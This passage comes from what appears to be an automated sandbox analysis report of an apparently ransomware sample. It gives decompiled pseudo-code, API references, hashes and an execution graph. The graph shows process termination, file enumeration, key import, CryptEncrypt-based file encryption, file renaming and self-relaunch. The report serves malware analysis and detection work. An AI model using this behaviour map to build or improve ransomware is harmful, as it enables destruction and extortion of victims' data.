                                    													goto L19;
                                    												}
                                    											}
                                    											goto L33;
                                    										}
                                    										goto L22;
                                    									}
                                    									goto L33;
                                    									L20:
                                    									_t34 =  *((intOrPtr*)(_t51 + 1));
                                    									_t51 = _t51 + 1;
                                    									_t47 = _t47 + 1;
                                    								} while (_t34 != 0);
                                    							}
                                    							goto L10;
                                    						}
                                    					}
                                    				} else {
                                    					_t25 =  *__ecx;
                                    					if(_t25 == 0) {
                                    						L10:
                                    						return lstrcpyA(_v8, "fabian wosar <3");
                                    					} else {
                                    						_t49 = __ecx - _t29;
                                    						do {
                                    							_t42 = _t29;
                                    							if(_t25 == 0) {
                                    								L8:
                                    								if( *_t42 == 0) {
                                    									goto L11;
                                    								} else {
                                    									goto L9;
                                    								}
                                    							} else {
                                    								while(1) {
                                    									_t26 =  *_t42;
                                    									if(_t26 == 0) {
                                    										goto L11;
                                    									}
                                    									_t38 =  *((char*)(_t49 + _t42)) - _t26;
                                    									if(_t38 != 0) {
                                    										goto L8;
                                    									} else {
                                    										_t42 = _t42 + 1;
                                    										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
                                    											continue;
                                    										} else {
                                    											goto L8;
                                    										}
                                    									}
                                    									goto L33;
                                    								}
                                    								goto L11;
                                    							}
                                    							goto L33;
                                    							L9:
                                    							_t25 =  *((intOrPtr*)(_t51 + 1));
                                    							_t51 = _t51 + 1;
                                    							_t49 = _t49 + 1;
                                    						} while (_t25 != 0);
                                    						goto L10;
                                    					}
                                    				}
                                    				L33:
                                    			}























                                    0x0f144ea6
                                    0x0f144eae
                                    0x0f144eb4
                                    0x0f144eb9
                                    0x0f144ebc
                                    0x0f144ec1
                                    0x0f144ec6
                                    0x0f144ec9
                                    0x0f144f1a
                                    0x0f144f1c
                                    0x00000000
                                    0x0f144f1e
                                    0x0f144f22
                                    0x0f144f5f
                                    0x0f144f61
                                    0x00000000
                                    0x0f144f63
                                    0x0f144f6d
                                    0x0f144f70
                                    0x0f144f70
                                    0x0f144f74
                                    0x00000000
                                    0x00000000
                                    0x0f144f7a
                                    0x0f144f7a
                                    0x0f144f7d
                                    0x0f144f80
                                    0x0f144f80
                                    0x0f144f84
                                    0x00000000
                                    0x00000000
                                    0x0f144f8e
                                    0x0f144f8e
                                    0x00000000
                                    0x0f144f8a
                                    0x0f144f8c
                                    0x00000000
                                    0x00000000
                                    0x0f144f95
                                    0x0f144fa4
                                    0x00000000
                                    0x0f144fa4
                                    0x0f144f80
                                    0x0f144f24
                                    0x0f144f24
                                    0x0f144f28
                                    0x0f144f2f
                                    0x0f144f31
                                    0x0f144f31
                                    0x0f144f36
                                    0x0f144f4f
                                    0x0f144f52
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f144f38
                                    0x0f144f38
                                    0x0f144f38
                                    0x0f144f3c
                                    0x00000000
                                    0x00000000
                                    0x0f144f45
                                    0x0f144f47
                                    0x00000000
                                    0x0f144f49
                                    0x0f144f49
                                    0x0f144f4d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f144f4d
                                    0x00000000
                                    0x0f144f47
                                    0x00000000
                                    0x0f144f38
                                    0x00000000
                                    0x0f144f54
                                    0x0f144f54
                                    0x0f144f57
                                    0x0f144f58
                                    0x0f144f59
                                    0x0f144f5d
                                    0x00000000
                                    0x0f144f28
                                    0x0f144f22
                                    0x0f144ecb
                                    0x0f144ecb
                                    0x0f144ecf
                                    0x0f144f05
                                    0x0f144f19
                                    0x0f144ed1
                                    0x0f144ed3
                                    0x0f144ed5
                                    0x0f144ed5
                                    0x0f144ed9
                                    0x0f144ef7
                                    0x0f144efa
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f144edb
                                    0x0f144ee0
                                    0x0f144ee0
                                    0x0f144ee4
                                    0x00000000
                                    0x00000000
                                    0x0f144eed
                                    0x0f144eef
                                    0x00000000
                                    0x0f144ef1
                                    0x0f144ef1
                                    0x0f144ef5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f144ef5
                                    0x00000000
                                    0x0f144eef
                                    0x00000000
                                    0x0f144ee0
                                    0x00000000
                                    0x0f144efc
                                    0x0f144efc
                                    0x0f144eff
                                    0x0f144f00
                                    0x0f144f01
                                    0x00000000
                                    0x0f144ed5
                                    0x0f144ecf
                                    0x00000000

                                    APIs
                                    • lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F1451ED), ref: 0F144F0D
                                    • lstrlenA.KERNEL32(00000000,?,0F1451ED), ref: 0F144F67
                                    • lstrcpyA.KERNEL32(?,?,?,0F1451ED), ref: 0F144F98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: fabian wosar <3
                                    • API String ID: 367037083-1724090804
                                    • Opcode ID: 7882f95dc58192e3a105e3e578b23929e8a0c6c37ac4d9d5ebfef406dafa9c20
                                    • Instruction ID: 75fca1ffd318632a12a80cc0a6c5f3588b8be3397f865febbe25b52c8b57149e
                                    • Opcode Fuzzy Hash: 7882f95dc58192e3a105e3e578b23929e8a0c6c37ac4d9d5ebfef406dafa9c20
                                    • Instruction Fuzzy Hash: A33176258081A95ADB3ACE3C44103FABFA2AFC3102FA912C9DCD59B287C3217476C390
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F143190(CHAR* _a4) {
                                    				char _t6;
                                    				CHAR* _t13;
                                    				CHAR* _t16;
                                    
                                    				_t13 = _a4;
                                    				_t16 = _t13;
                                    				if( *_t13 == 0) {
                                    					L5:
                                    					lstrcmpiA(_t13, "mask");
                                    					_t10 =  ==  ? 1 : 0;
                                    					lstrcmpiA(_a4, "pub_key");
                                    					 *_t16 = 0x3d;
                                    					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
                                    					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
                                    					return  ==  ? 2 :  ==  ? 1 : 0;
                                    				} else {
                                    					while(1) {
                                    						_t6 =  *_t16;
                                    						if(_t6 == 0x7d) {
                                    							break;
                                    						}
                                    						if(_t6 == 0x3d) {
                                    							 *_t16 = 0;
                                    							goto L5;
                                    						} else {
                                    							_t16 =  &(_t16[1]);
                                    							if( *_t16 != 0) {
                                    								continue;
                                    							} else {
                                    								goto L5;
                                    							}
                                    						}
                                    						goto L8;
                                    					}
                                    					return 0;
                                    				}
                                    				L8:
                                    			}






                                    0x0f143193
                                    0x0f143197
                                    0x0f14319c
                                    0x0f1431b0
                                    0x0f1431b9
                                    0x0f1431ce
                                    0x0f1431d1
                                    0x0f1431d9
                                    0x0f1431e1
                                    0x0f1431e4
                                    0x0f1431e9
                                    0x0f1431a0
                                    0x0f1431a0
                                    0x0f1431a0
                                    0x0f1431a4
                                    0x00000000
                                    0x00000000
                                    0x0f1431a8
                                    0x0f1431ec
                                    0x00000000
                                    0x0f1431aa
                                    0x0f1431aa
                                    0x0f1431ae
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f1431ae
                                    0x00000000
                                    0x0f1431a8
                                    0x0f1431f5
                                    0x0f1431f5
                                    0x00000000

                                    APIs
                                    • lstrcmpiA.KERNEL32(0F145444,mask,0F145445,?,?,0F143441,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F1431B9
                                    • lstrcmpiA.KERNEL32(0F145444,pub_key,?,0F143441,0F145445,00000000,00000000,00000000,?,?,0F145444,00000000), ref: 0F1431D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcmpi
                                    • String ID: mask$pub_key
                                    • API String ID: 1586166983-1355590148
                                    • Opcode ID: df7ba3fee0283b8c850d518a5f1f93d0f21e9ace0ac05fd03437990a0db5a305
                                    • Instruction ID: bbc218eade748cdeafd7f4348079e32239d5aa6d1c56e4edca4e4f6a1e159fdd
                                    • Opcode Fuzzy Hash: df7ba3fee0283b8c850d518a5f1f93d0f21e9ace0ac05fd03437990a0db5a305
                                    • Instruction Fuzzy Hash: 6DF046723483881EE7194EA89C45BA1BBC89BC1711F84007EE689C3242C3AAB8A29750
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:20.5%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:713
                                    Total number of Limit Nodes:13
                                    execution_graph 2416 f584a78 2417 f584a74 2416->2417 2418 f584a8f OpenProcess 2417->2418 2420 f584ac4 Process32NextW 2417->2420 2418->2417 2419 f584aa1 TerminateProcess CloseHandle 2418->2419 2419->2417 2420->2417 2421 f584ad7 2420->2421 2422 f584ae9 FindCloseChangeNotification 2421->2422 2423 f584adb VirtualFree 2421->2423 2423->2422 2434 f586e69 2435 f586e70 lstrcmpW 2434->2435 2436 f586e8a lstrcmpW 2435->2436 2437 f586f13 FindNextFileW 2435->2437 2436->2437 2438 f586ea0 lstrcatW 2436->2438 2437->2435 2439 f586f2b FindClose 2437->2439 2440 f586eb3 lstrcatW 2438->2440 2444 f586ecc 2438->2444 2441 f586f34 2439->2441 2445 f586df0 2440->2445 2444->2437 2464 f586ab0 VirtualAlloc wsprintfW 2444->2464 2472 f586780 VirtualAlloc 2445->2472 2447 f586e06 2448 f586f34 2447->2448 2484 f586ba0 lstrlenW lstrcatW FindFirstFileW 2447->2484 2448->2444 2450 f586e15 2450->2448 2499 f586d40 VirtualAlloc wsprintfW CreateFileW 2450->2499 2452 f586e22 lstrlenW lstrcatW FindFirstFileW 2453 f586e58 2452->2453 2454 f586e64 2452->2454 2453->2444 2455 f586e70 lstrcmpW 2454->2455 2456 f586e8a lstrcmpW 2455->2456 2457 f586f13 FindNextFileW 2455->2457 2456->2457 2458 f586ea0 lstrcatW 2456->2458 2457->2455 2459 f586f2b FindClose 2457->2459 2460 f586eb3 lstrcatW 2458->2460 2463 f586ecc 2458->2463 2459->2448 2462 f586df0 102 API calls 2460->2462 2461 f586ab0 69 API calls 2461->2463 2462->2463 2463->2457 2463->2461 2507 f5869b0 2464->2507 2466 f586aea 2467 f586b07 VirtualFree 2466->2467 2515 f5868f0 lstrlenW lstrlenW 2466->2515 2467->2444 2470 f586b03 2470->2467 2527 f5837b0 GetFileAttributesW SetFileAttributesW 2470->2527 2474 f5867a7 2472->2474 2473 f5868d4 VirtualFree 2473->2447 2474->2473 2475 f58684f SHGetSpecialFolderPathW 2474->2475 2476 f58686d SHGetSpecialFolderPathW 2475->2476 2477 f586860 2475->2477 2478 f58687a 2476->2478 2479 f586887 SHGetSpecialFolderPathW 2476->2479 2477->2473 2477->2476 2478->2473 2478->2479 2480 f5868a1 SHGetSpecialFolderPathW 2479->2480 2481 f586894 2479->2481 2482 f5868bb VirtualFree 2480->2482 2483 f5868ae 2480->2483 2481->2473 2481->2480 2482->2447 2483->2473 2483->2482 2485 f586bf0 lstrcmpW 2484->2485 2486 f586d12 FindNextFileW 2485->2486 2487 f586c06 lstrcmpW 2485->2487 2486->2485 2489 f586d2a FindClose 2486->2489 2487->2486 2488 f586c1c lstrcatW lstrlenW 2487->2488 2498 f586c3f 2488->2498 2489->2450 2490 f586c54 lstrcmpW 2491 f586c64 CreateFileW GetFileSize 2490->2491 2490->2498 2492 f586c91 VirtualAlloc 2491->2492 2493 f586cf2 CloseHandle 2491->2493 2494 f586ca6 ReadFile 2492->2494 2492->2498 2493->2489 2493->2498 2495 f586ce1 VirtualFree 2494->2495 2494->2498 2495->2498 2496 f586cc9 lstrlenA 2505 f586b40 lstrlenA 2496->2505 2498->2486 2498->2490 2498->2493 2498->2495 2498->2496 2500 f586d8c GetLastError 2499->2500 2501 f586d9e 2499->2501 2502 f586dd0 VirtualFree 2500->2502 2503 f586dc4 CloseHandle 2501->2503 2504 f586da7 lstrlenW WriteFile 2501->2504 2502->2452 2503->2502 2504->2503 2506 f586b5a 2505->2506 2506->2498 2508 f5869ca lstrlenW 2507->2508 2509 f5869c0 2507->2509 2510 f5869de 2508->2510 2511 f5869f0 2508->2511 2509->2466 2510->2511 2512 f5869fb lstrlenW VirtualAlloc wsprintfW 2510->2512 2511->2466 2514 f586a38 VirtualFree 2512->2514 2514->2466 2516 f58691e lstrcmpiW 2515->2516 2519 f58690c 2515->2519 2517 f58693c lstrcmpiW 2516->2517 2518 f586933 2516->2518 2517->2518 2520 f586948 lstrcmpiW 2517->2520 2518->2470 2519->2516 2520->2518 2521 f586954 lstrcmpiW 2520->2521 2521->2518 2522 f586960 lstrcmpiW 2521->2522 2522->2518 2523 f58696c lstrcmpiW 2522->2523 2523->2518 2524 f586978 lstrcmpiW 2523->2524 2524->2518 2525 f586984 lstrcmpiW 2524->2525 2525->2518 2526 f586990 lstrcmpiW 2525->2526 2526->2470 2557 f586500 2527->2557 2530 f588400 9 API calls 2531 f583875 2530->2531 2532 f588400 9 API calls 2531->2532 2533 f583885 VirtualAlloc VirtualAlloc 2532->2533 2559 f586660 EnterCriticalSection CryptAcquireContextW 2533->2559 2536 f5838fb MessageBoxA 2538 f583ba8 VirtualFree 2536->2538 2537 f583927 2539 f586660 10 API calls 2537->2539 2538->2467 2540 f58393c 2539->2540 2541 f583962 2540->2541 2542 f583943 GetLastError 2540->2542 2543 f583975 CreateFileW 2541->2543 2542->2538 2544 f5839cc VirtualAlloc VirtualAlloc 2543->2544 2545 f58399d VirtualFree VirtualFree 2543->2545 2546 f583a05 ReadFile 2544->2546 2545->2538 2547 f583b10 VirtualFree 2546->2547 2553 f583a02 _memmove 2546->2553 2548 f583b28 WriteFile WriteFile WriteFile 2547->2548 2549 f583b62 CloseHandle VirtualFree VirtualFree VirtualFree 2547->2549 2548->2549 2550 f583b99 MoveFileW 2549->2550 2551 f583ba5 2549->2551 2550->2551 2551->2538 2552 f583a58 VirtualAlloc 2552->2553 2553->2546 2553->2547 2553->2552 2553->2553 2554 f583a77 VirtualAlloc 2553->2554 2555 f583ab5 VirtualFree SetFilePointer WriteFile 2553->2555 2556 f583af7 VirtualFree 2553->2556 2554->2553 2554->2555 2555->2553 2555->2556 2556->2547 2556->2553 2558 f5837f6 VirtualAlloc lstrcpyW lstrcatW 2557->2558 2558->2530 2560 f58669b GetLastError 2559->2560 2561 f5866d1 CryptImportKey 2559->2561 2564 f5866a8 CryptAcquireContextW 2560->2564 2565 f5838f4 2560->2565 2562 f586755 CryptReleaseContext LeaveCriticalSection 2561->2562 2563 f5866f6 CryptGetKeyParam CryptEncrypt GetLastError 2561->2563 2562->2565 2563->2562 2567 f58674d 2563->2567 2564->2565 2566 f5866c8 2564->2566 2565->2536 2565->2537 2566->2561 2567->2562 1751 f584b20 Sleep 1796 f5847d0 1751->1796 1754 f584b3a ExitProcess 1755 f584b42 CreateThread 1756 f584b8c 1755->1756 1757 f584b60 WaitForSingleObject 1755->1757 2305 f582d30 1755->2305 1812 f5848c0 CreateToolhelp32Snapshot VirtualAlloc 1756->1812 1758 f584b82 CloseHandle 1757->1758 1759 f584b76 TerminateThread 1757->1759 1758->1756 1759->1758 1761 f584b91 1822 f5842b0 1761->1822 1765 f584b9e 1766 f584bec VirtualAlloc 1765->1766 1773 f584c3b 1765->1773 1768 f584c09 GetModuleFileNameW 1766->1768 1769 f584c33 ExitProcess 1766->1769 1767 f584c75 1775 f584ce8 1767->1775 1776 f584c9f lstrlenA VirtualAlloc CryptStringToBinaryA 1767->1776 1896 f583db0 1768->1896 1773->1767 1774 f584c5f Sleep 1773->1774 1845 f585860 1773->1845 1774->1773 1907 f584200 1775->1907 1776->1775 1778 f584ce0 ExitProcess 1776->1778 1780 f584d12 1916 f583ff0 VirtualAlloc GetTickCount 1780->1916 1781 f584d05 1910 f5841d0 1781->1910 1785 f584d1a DeleteCriticalSection 1924 f583c70 AllocateAndInitializeSid 1785->1924 1787 f584d2a 1788 f584d33 VirtualAlloc 1787->1788 1928 f5845b0 1787->1928 1790 f584d7a 1788->1790 1791 f584d50 GetModuleFileNameW 1788->1791 1792 f584d9d ExitThread 1790->1792 1793 f584d83 ShellExecuteW 1790->1793 1794 f583db0 17 API calls 1791->1794 1793->1792 1795 f584d69 VirtualFree 1794->1795 1795->1790 1935 f583bc0 GetProcessHeap 1796->1935 1798 f584807 1936 f587490 1798->1936 1802 f584819 VirtualAlloc 1803 f584838 lstrcpyW lstrlenW 1802->1803 2018 f5870a0 1803->2018 1806 f584869 CreateMutexW GetLastError 1807 f58488a VirtualFree 1806->1807 1808 f584881 GetLastError 1806->1808 2044 f587d70 1807->2044 1808->1807 1813 f584a58 1812->1813 1814 f584a6b 1812->1814 1813->1814 1815 f584a63 Process32FirstW 1813->1815 1816 f584a8f OpenProcess 1814->1816 1818 f584ac4 Process32NextW 1814->1818 1815->1814 1816->1814 1817 f584aa1 TerminateProcess CloseHandle 1816->1817 1817->1814 1818->1814 1819 f584ad7 1818->1819 1820 f584ae9 FindCloseChangeNotification 1819->1820 1821 f584adb VirtualFree 1819->1821 1820->1761 1821->1820 1823 f584598 1822->1823 1824 f5842cb 1822->1824 1842 f586550 VirtualAlloc VirtualAlloc 1823->1842 2115 f583bc0 GetProcessHeap 1824->2115 1826 f5842f6 1827 f587490 96 API calls 1826->1827 1828 f584302 1827->1828 1829 f5872a0 16 API calls 1828->1829 1830 f58430e VirtualAlloc 1829->1830 1831 f584332 1830->1831 1832 f5870a0 49 API calls 1831->1832 1833 f584350 1832->1833 1834 f58435c lstrlenW 1833->1834 1841 f584390 1834->1841 1835 f584456 1836 f584578 VirtualFree 1835->1836 1837 f584547 VirtualAlloc 1835->1837 1840 f587d70 10 API calls 1836->1840 1837->1836 1839 f584564 wsprintfW 1837->1839 1838 f5843e0 lstrcpyW lstrlenW 1838->1835 1838->1841 1839->1836 1840->1823 1841->1835 1841->1838 2116 f5863e0 CryptAcquireContextW 1842->2116 2124 f583bc0 GetProcessHeap 1845->2124 1847 f5858a4 1848 f587490 96 API calls 1847->1848 1849 f5858ad 1848->1849 1850 f5872a0 16 API calls 1849->1850 1851 f5858b6 VirtualAlloc 1850->1851 1852 f5858ee 1851->1852 1853 f585d98 VirtualFree 1852->1853 1854 f585961 6 API calls 1852->1854 1855 f587d70 10 API calls 1853->1855 1856 f5859e0 lstrlenA 1854->1856 1857 f585dae 1855->1857 1859 f585a08 lstrlenA 1856->1859 1857->1773 1861 f585a4e lstrlenA 1859->1861 1866 f585a24 lstrlenA 1859->1866 1862 f585a7e lstrcatW lstrlenW 1861->1862 1870 f585a57 lstrlenA 1861->1870 1863 f5870a0 49 API calls 1862->1863 1865 f585aa8 1863->1865 2125 f5835c0 VirtualAlloc 1865->2125 1867 f585a4a 1866->1867 1867->1861 1870->1862 1871 f585ac5 1872 f585ac9 ExitProcess 1871->1872 1873 f585ad0 18 API calls 1871->1873 1874 f585bcb lstrlenW 1873->1874 1876 f585be9 VirtualFree 1874->1876 1877 f585bf7 lstrlenW VirtualAlloc 1874->1877 1876->1877 1878 f585c1a wsprintfA 1877->1878 1879 f585c2e 1877->1879 1878->1879 2137 f585f00 VirtualAlloc 1879->2137 1882 f585c69 GetLastError 1883 f585c6f lstrlenA VirtualAlloc lstrlenA 1882->1883 1884 f585c97 lstrlenA 1883->1884 1886 f585cd6 lstrlenA MultiByteToWideChar 1884->1886 1890 f585cb0 lstrlenA 1884->1890 2146 f5854f0 1886->2146 1890->1886 1891 f585d5c VirtualFree VirtualFree VirtualFree 1891->1853 1892 f585d0f VirtualFree VirtualFree VirtualFree VirtualFree 1894 f587d70 10 API calls 1892->1894 1895 f585d53 1894->1895 1895->1773 2272 f583cf0 1896->2272 1898 f583dc6 1899 f583fca VirtualFree 1898->1899 1900 f583c70 4 API calls 1898->1900 1899->1769 1901 f583dd3 1900->1901 1901->1899 1902 f583ddb ExpandEnvironmentStringsW wsprintfW VirtualAlloc GetForegroundWindow 1901->1902 1903 f583fb0 ShellExecuteExW 1902->1903 1904 f583fd1 WaitForSingleObject CloseHandle ExitProcess 1903->1904 1905 f583fb7 1903->1905 1905->1903 1906 f583fbd VirtualFree 1905->1906 1906->1899 1908 f58420d VirtualAlloc 1907->1908 1909 f584228 InitializeCriticalSection 1907->1909 1908->1909 1909->1780 1909->1781 1911 f5841e4 1910->1911 1912 f583ff0 280 API calls 1911->1912 1913 f5841ec 1912->1913 2275 f586620 VirtualFree VirtualFree 1913->2275 1915 f5841f4 1915->1785 1917 f584050 GetDriveTypeW 1916->1917 1918 f584065 1917->1918 1918->1917 1919 f58406a CreateThread 1918->1919 1920 f5840ae WaitForMultipleObjects GetTickCount 1918->1920 1919->1918 1921 f58410f 1920->1921 2276 f585670 VirtualAlloc 1921->2276 1923 f5841bd 1923->1785 1925 f583caa 1924->1925 1926 f583cae GetModuleHandleA GetProcAddress 1924->1926 1925->1787 1927 f583cd0 FreeSid 1926->1927 1927->1787 1929 f583cf0 4 API calls 1928->1929 1930 f5845c4 VirtualAlloc 1929->1930 1932 f58477b 1930->1932 1933 f58477f GetSystemDirectoryW lstrcatW ShellExecuteW 1930->1933 1934 f5847af VirtualFree 1932->1934 1933->1934 1934->1788 1935->1798 1937 f5874a9 VirtualAlloc GetUserNameW 1936->1937 1938 f5874ce 1936->1938 1937->1938 1939 f5874d4 VirtualAlloc GetComputerNameW 1938->1939 1940 f5874f6 1938->1940 1939->1940 1941 f587502 VirtualAlloc 1940->1941 1942 f587556 1940->1942 1941->1942 1943 f587519 1941->1943 1944 f587560 VirtualAlloc RegOpenKeyExW 1942->1944 1945 f5875f5 1942->1945 2065 f587410 RegOpenKeyExW 1943->2065 1949 f58759c RegQueryValueExW 1944->1949 1950 f5875de VirtualFree 1944->1950 1946 f5876f9 1945->1946 1947 f5875ff VirtualAlloc VirtualAlloc 1945->1947 1951 f58775b 1946->1951 1952 f5876ff VirtualAlloc 1946->1952 1953 f587634 wsprintfW RegOpenKeyExW 1947->1953 1955 f5875c9 GetLastError 1949->1955 1956 f5875c0 1949->1956 1950->1945 1959 f5877ce 1951->1959 1960 f587761 GetNativeSystemInfo VirtualAlloc 1951->1960 1957 f587410 5 API calls 1952->1957 1958 f587669 RegQueryValueExW 1953->1958 1974 f58768b 1953->1974 1954 f587534 1954->1942 1964 f587551 wsprintfW 1954->1964 1961 f5875cf RegCloseKey 1955->1961 1956->1961 1962 f58772d 1957->1962 1963 f587694 GetLastError 1958->1963 1958->1974 1973 f5877e8 1959->1973 2070 f587b70 VirtualAlloc VirtualAlloc 1959->2070 1965 f587784 1960->1965 1969 f5877a7 wsprintfW 1960->1969 1961->1945 1961->1950 1962->1951 1977 f587410 5 API calls 1962->1977 1967 f58769a RegCloseKey 1963->1967 1964->1942 1965->1969 1970 f587792 wsprintfW ExitProcess 1965->1970 1967->1974 1968 f5877f9 VirtualAlloc VirtualAlloc GetWindowsDirectoryW GetVolumeInformationW 1975 f587410 5 API calls 1968->1975 1969->1959 1971 f5876d6 wsprintfW VirtualFree 1971->1946 1973->1968 1976 f587939 1973->1976 1974->1953 1974->1967 1974->1970 1974->1971 1981 f587885 1975->1981 1978 f587949 VirtualAlloc 1976->1978 1979 f587af2 1976->1979 1980 f58774e wsprintfW 1977->1980 1998 f5879a0 1978->1998 1982 f587afb VirtualAlloc 1979->1982 1983 f584810 1979->1983 1980->1951 1984 f587889 lstrlenW 1981->1984 1985 f5878ba wsprintfW lstrcatW GetModuleHandleW GetProcAddress 1981->1985 1982->1983 1986 f587b19 1982->1986 2000 f5872a0 1983->2000 1987 f587410 5 API calls 1984->1987 1988 f587914 VirtualFree 1985->1988 1989 f5878fd lstrlenW 1985->1989 2087 f586ff0 1986->2087 1987->1985 1988->1976 1989->1988 1992 f5879c2 GetDriveTypeW 1992->1998 1994 f587b24 VirtualFree 1994->1983 1995 f5879e9 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 1997 f587ac3 lstrcatW 1995->1997 1995->1998 1996 f587ae3 lstrlenW 1996->1979 1997->1998 1998->1992 1998->1995 1998->1996 1999 f587a5c lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 1998->1999 1999->1998 2007 f5872b0 2000->2007 2001 f58730a 2003 f58732b 2001->2003 2004 f587310 lstrlenW lstrlenW 2001->2004 2002 f5872ef lstrlenW lstrlenW 2002->2001 2005 f58734c 2003->2005 2006 f587331 lstrlenW lstrlenW 2003->2006 2004->2003 2008 f58736d 2005->2008 2009 f587352 lstrlenW lstrlenW 2005->2009 2006->2005 2007->2001 2007->2002 2010 f58738e 2008->2010 2011 f587373 lstrlenW lstrlenW 2008->2011 2009->2008 2012 f5873af 2010->2012 2013 f587394 lstrlenW lstrlenW 2010->2013 2011->2010 2014 f5873d9 2012->2014 2015 f5873be lstrlenW lstrlenW 2012->2015 2013->2012 2016 f5873e2 lstrlenW lstrlenW 2014->2016 2017 f587407 2014->2017 2015->2014 2016->1802 2017->1802 2019 f5870ba lstrcatW lstrcatW lstrcatW lstrcatW 2018->2019 2020 f5870dc 2018->2020 2019->2020 2021 f5870fd 2020->2021 2022 f5870e1 lstrcatW lstrcatW lstrcatW lstrcatW 2020->2022 2023 f58711f 2021->2023 2024 f587103 lstrcatW lstrcatW lstrcatW lstrcatW 2021->2024 2022->2021 2025 f587141 2023->2025 2026 f587125 lstrcatW lstrcatW lstrcatW lstrcatW 2023->2026 2024->2023 2027 f587163 2025->2027 2028 f587147 lstrcatW lstrcatW lstrcatW lstrcatW 2025->2028 2026->2025 2029 f587169 lstrcatW lstrcatW lstrcatW lstrcatW 2027->2029 2030 f587185 2027->2030 2028->2027 2029->2030 2031 f58718b lstrcatW lstrcatW lstrcatW lstrcatW 2030->2031 2032 f5871a7 2030->2032 2031->2032 2033 f5871c9 2032->2033 2034 f5871ad lstrcatW lstrcatW lstrcatW lstrcatW 2032->2034 2035 f5871eb 2033->2035 2036 f5871cf lstrcatW lstrcatW lstrcatW lstrcatW 2033->2036 2034->2033 2037 f58725c 2035->2037 2038 f5871f1 VirtualAlloc 2035->2038 2036->2035 2039 f58727e lstrlenW 2037->2039 2040 f587262 lstrcatW lstrcatW lstrcatW lstrcatW 2037->2040 2041 f58720c wsprintfW 2038->2041 2042 f587221 wsprintfW 2038->2042 2039->1806 2040->2039 2043 f587230 lstrcatW lstrcatW lstrcatW lstrcatW VirtualFree 2041->2043 2042->2043 2043->2037 2045 f587d8b 2044->2045 2046 f587d7f VirtualFree 2044->2046 2047 f587d9d 2045->2047 2048 f587d91 VirtualFree 2045->2048 2046->2045 2049 f587daf 2047->2049 2050 f587da3 VirtualFree 2047->2050 2048->2047 2051 f587dc1 2049->2051 2052 f587db5 VirtualFree 2049->2052 2050->2049 2053 f587dd3 2051->2053 2054 f587dc7 VirtualFree 2051->2054 2052->2051 2055 f587dd9 VirtualFree 2053->2055 2056 f587de5 2053->2056 2054->2053 2055->2056 2057 f587deb VirtualFree 2056->2057 2058 f587df7 2056->2058 2057->2058 2059 f587e09 2058->2059 2060 f587dfd VirtualFree 2058->2060 2061 f587e1b 2059->2061 2062 f587e0f VirtualFree 2059->2062 2060->2059 2063 f5848aa 2061->2063 2064 f587e24 VirtualFree 2061->2064 2062->2061 2063->1754 2063->1755 2064->2063 2066 f58747e 2065->2066 2067 f587432 RegQueryValueExW 2065->2067 2066->1954 2068 f587451 RegCloseKey 2067->2068 2069 f587466 GetLastError RegCloseKey 2067->2069 2068->1954 2069->1954 2071 f587c0c CreateToolhelp32Snapshot 2070->2071 2072 f587c32 2070->2072 2073 f587c3d Process32FirstW 2071->2073 2074 f587c24 VirtualFree 2071->2074 2072->1973 2075 f587d2d VirtualFree FindCloseChangeNotification 2073->2075 2080 f587c5d 2073->2080 2074->2072 2076 f587d4d VirtualFree 2075->2076 2077 f587d57 2075->2077 2076->2077 2077->1973 2078 f587d07 2079 f587d25 2078->2079 2081 f587d15 lstrlenW 2078->2081 2079->2075 2080->2078 2082 f587c9a lstrcpyW lstrcatW 2080->2082 2083 f587caf lstrcatW lstrcatW 2080->2083 2085 f587ce7 Process32NextW 2080->2085 2081->2079 2084 f587cc0 lstrlenW 2082->2084 2083->2084 2084->2085 2085->2078 2086 f587cf8 GetLastError 2085->2086 2086->2078 2086->2080 2097 f587e40 InternetOpenW 2087->2097 2091 f587046 2092 f58704a lstrlenA 2091->2092 2093 f587071 VirtualFree 2091->2093 2092->2093 2096 f58705a wsprintfW 2092->2096 2094 f58708d 2093->2094 2095 f587086 InternetCloseHandle 2093->2095 